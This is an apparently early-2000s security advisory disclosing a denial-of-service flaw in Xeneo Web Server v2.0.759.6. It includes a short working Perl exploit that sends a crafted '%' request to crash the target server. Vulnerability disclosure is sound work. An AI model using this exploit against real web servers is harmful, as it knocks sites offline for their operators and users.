|
 Xeneo Web
Server v2.0.759.6 DoS Vulnerability
Type Denial of Service Release Date October 6, 2002 Product / Vendor Xeneo Web Server is a fast, compact web server that makes it easy to set up and administer a web site on the Windows platform. Xeneo Web Server key features: - Unlimited Virtual Hosts http://www.northernsolutions.com Summary Due to a denial of service vulnerability in Xeneo Web Server v2.0.759.6, it is possible for an attacker to cause the server to stop responding and crash. Problem is due to the "%" parameter's handling of unusually crafted requests. The Web server must be restarted to regain normal functionality. Exploit An exploit for this vulnerability exists and is available below. ==================== SNIP ==================== #!/usr/bin/perl -w die "Xeneo Web Server v2.0.759.6 DoS Vulnerability by SecurityOffice / Usage: $0 host \n" if $#ARGV <0; print &get($ARGV[0]); exit 0; sub get { $host = $ARGV[0]; system "lynx $host/%"; print "Done!\n\n"; } ==================== SNIP ==================== Tested Xeneo Web Server v2.0.759.6 / Windows 2000 sp3 Vulnerable Xeneo Web Server v2.0.759.6 Disclaimer http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author Tamer Sahin |
 |